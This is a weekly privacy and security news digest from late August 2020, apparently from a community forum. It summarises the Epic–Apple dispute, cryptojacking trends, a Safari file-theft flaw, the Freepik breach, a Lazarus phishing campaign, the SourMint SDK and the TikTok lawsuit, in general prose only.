Privacy and Security related news for the week ending 2020 08 25

This week we start with a battle and end with an army and … both are cyber related. We have an update on the uptick in cyber related browser jacking, a couple of breaches that might affect you and a new lawsuit that certainly will.

US: Microsoft backs Epic against Apple in legal fight over Unreal Engine on iOS

Kyle Orland for ARS technica: In court documents that surfaced this weekend, Microsoft offered its support for Epic Games in the Unreal Engine-maker’s quickly unfolding legal battle with Apple over access to the iOS app marketplace.

The legal declaration from Microsoft Gaming Developer Experiences General Manager Kevin Gammill comes in response to Apple’s threat to halt Epic’s access to software development tools used to update its popular Unreal Engine for use on iOS. That threat itself came after Epic tried to use its own payment system in the iOS version of Fortnite to get around Apple’s 30-percent platform fee. That move quickly got the game pulled from the Apple App Store and led Epic to file a lawsuit in response.

Microsoft uses Unreal Engine for iOS games such as Forza Street, and Gammill says Epic’s software is “critical technology for numerous game creators, including Microsoft… if the Unreal Engine cannot support games for iOS or macOS, Microsoft would be required to choose between abandoning its customers and potential customers on the iOS and macOS platforms or choosing a different game engine when preparing to develop new games.”

Microsoft also exercises strict, iOS-style control over the software market on Xbox consoles and extracts a similar 30-percent fee for in-game items sold on the platform. But Sweeney has said these console markets are different from mobile platforms because of console-makers’ “enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers.”

Browser-based crypto jacking sees sudden spike in activity in Q2 2020

Browser-based cryptocurrency mining, also known as cryptojacking, made a surprising comeback earlier this year, in the month of June.

In its Threat Landscape Trends report for Q2 2020, US cyber-security vendor Symantec said cryptojacking saw a 163% increase in detections, compared to the previous quarters.

The spike in activity is extremely uncharacteristic for this particular threat, considered by all security experts to be long dead. Despite the sudden spike in browser-based crypto jacking detections in June, a full comeback is not expected. Most cybercrime groups who experimented with crypto jacking operations in the past usually dropped it weeks later, as they also discovered that browser-based cryptocurrency-mining was both a waste of their time and too noisy, drawing more attention to their respective operations than profits.

Unpatched Safari Vulnerability Allows Local File Theft

The issue was discovered in April by Pawel Wylecial, a Poland-based security researcher and founder of cybersecurity services companies REDTEAM.PL and BlackOwlSec. Apple said at the time that it had started investigating the issue, but the tech giant told Wylecial in mid-August that it would only address it with a security update in the spring of 2021.

Apple asked the researcher to hold off disclosure until then, but Wylecial decided that it was too long and made his findings public this week.

The vulnerability is related to the Web Share API, which allows users to share links from Safari through third-party apps. Launching an attack requires convincing the targeted user to visit a malicious website and performing certain actions, but the researcher has described an attack scenario that could be successful.

He set up a website containing an image of a kitten and urging visitors to share it with their friends using a dedicated button on the page. When the user presses the button, they are asked to select the application they want to use to share a link to the image. If they send it via email, the attacker’s code, in addition to adding the image URL, attaches an arbitrary file from the victim’s system.

Wylecial says he has tested the attack on devices running iOS 13.4.1 and 13.6, macOS Mojave 10.14.16 with Safari 13.1, and on macOS Catalina 10.15.5 with Safari 13.1.1.

Eight Million Freepik Users Suffer Data Compromise

Freepik has disclosed a major data breach affecting over eight million customers.

Additionally, the incident affected users of the sister site Flaticon, which claims to run the world’s largest database of free icons.

In a breach notice over the weekend, the firm claimed an attacker had compromised an SQL injection vulnerability in the Flaticon site which allowed them to access user information in a database.

Of the 8.3 million customers affected, all had their email address taken, and nearly 3.8 million had a hashed password for the site also stolen.

Most (3.6 million) were encrypted with bcrypt, whilst 229,000 were protected with the less secure MD5. “Those who had a password hashed with salted MD5 got their password cancelled and have received an email to urge them to choose a new password and to change their password if it was shared with any other site.

Lazarus group strikes cryptocurrency firm through LinkedIn job adverts

According to F-Secure, the latest Lazarus attack was tracked through a LinkedIn job advert. The human target, a system administrator, received a phishing document in their personal LinkedIn account that related to a blockchain technology company seeking a new sysadmin with the employee’s skill set.

The phishing email is similar to Lazarus samples already made available on VirusTotal, including the same names, authors, and word count elements.

As is the case with many phishing documents, you need to entice a victim to enable macros that hide malicious code for them to be effective. In this case, the Microsoft Word document claimed to be protected under the EU’s General Data Protection Regulation (GDPR), and so, the document’s content could only be shown if macros were enabled.

Once permission is granted, the document’s macro created a .LNK file designed to execute a file called mshta.exe and call out a link connected to a VBScript. (A worry on Windows machines),

A tailored version of Mimikatz is used to harvest credentials from an infected machine, especially those with financial value – such as cryptocurrency wallets or online bank accounts.

F-Secure says that Lazarus has attempted to avoid detection by wiping evidence, including deleting security events and logs.

Google Project Zero expert found 3 flaws in Apache Web Server

Pierluigi Paganini: Apache Foundation released the 2.4.46 version to address three flaws affecting its web server software that could be potentially exploited by attackers, under specific conditions, to execute arbitrary code or to trigger a DoS condition by crashing the server.

DK: Viking Snowden: Denmark spy chief 'relieved of duty’

Kieren McCarthy: Denmark’s top foreign intelligence chief has been suspended for spying on Danish citizens illegally for up to six years after a whistleblower released a trove of documents to government regulators.

In a press release [ in Danish] yesterday, the independent regulator of the Danish security services (Tilsynet med Efterretningstjenesterne or TET) said it had received information from a whistleblower in November that revealed the country’s foreign intelligence service “had withheld key and crucial information,” and given “incorrect information on matters relating to the collection of the service and disclosure of information.”

The Danish government announced that head of the Forsvarets Efterretningstjeneste (FE) service, Lars Findsen, as well as two senior officials that focused on military intelligence – and who were not named – had been “relieved of duty for the time being.”

Large Ad Network Collects Private Activity Data, Reroutes Clicks

An SDK, dubbed SourMint, has been used in more than 1,200 iOS apps currently available in the Apple App Store, these apps have a total of 300 million downloads per month.

Snyk researchers, who released the findings, did not observe the same malicious behavior in the Android versions of the SourMint SDK. The behavior is as follows:

The experts analyzed the code obtained from Mintegral’s official GitHub account and discovered that the malicious behavior was observed in versions of the iOS SDK dated back to 5.5.1 (released in July 2019).

According to Snyk, the SourMint SDK can allow Mintegral to steal revenue from other ad networks used by applications integrating the SDK. It also allegedly harvests system and device information, along with visited URLs, accessed through applications that leverage the SDK.

“The Snyk research team has uncovered malicious behavior in a popular Advertising SDK used by over 1,200 apps in the AppStore which represent over 300 Million downloads per month, based on industry expert estimates.” reads a post published by the security firm.

“The malicious code was uncovered in the iOS versions of the SDK from the Chinese mobile ad platform provider, Mintegral dating back to July 2019.

The malicious code can spy on user activity by logging URL-based requests made through the app.

This activity is logged to a third-party server and could potentially include personally identifiable information (PII) and other sensitive information.”

US: TikTok Sues Over Ban Ordered by Trump

AFP: As tensions soared between the world’s two biggest economies, President Donald Trump signed an executive order on August 6 giving Americans 45 days to stop doing business with TikTok’s Chinese parent company ByteDance – effectively setting a deadline for a sale of the app to a US company.

“Today we are filing a complaint in federal court challenging the administration’s efforts to ban TikTok in the US,” the company said in a blog post.

TikTok argued in the lawsuit that Trump’s order was a misuse of the International Emergency Economic Powers Act because the platform – on which users share often playful short-form videos – is not “an unusual and extraordinary threat.”

The executive order “has the potential to strip the rights of that community without any evidence to justify such an extreme action,” the suit contended.

The app has been downloaded 175 million times in the US and more than a billion times around the world.

UK: British army considers trading tanks for keyboard troops

The Times reported today that “the changing character of warfare demands more investment in cyber-capabilities, space and other cutting-edge technologies.”

The Ministry of Defense (MoD) has been putting more time and effort into all things cyber, most recently raising a dedicated Security Operations Centre regiment after a previous Chief of the Defense Staff called for techies to join up as cyber-specialists.

Current Army thinking is that “digital”, “cyber” and “autonomous” capabilities will be more valuable in future wars than battalions of riflemen or regiments of heavy armored vehicles.

Britain is not alone in thinking cyber weaponry is becoming more important: last year French defense minister Florence Parly declared “cyber war has begun”, saying that the Fifth Republic would attack its foes using cyber techniques as well as traditional methods of warfare.

That’s it for this week DAMLers. Have fun, stay safe and stay secure!


Thanks for this update @rps!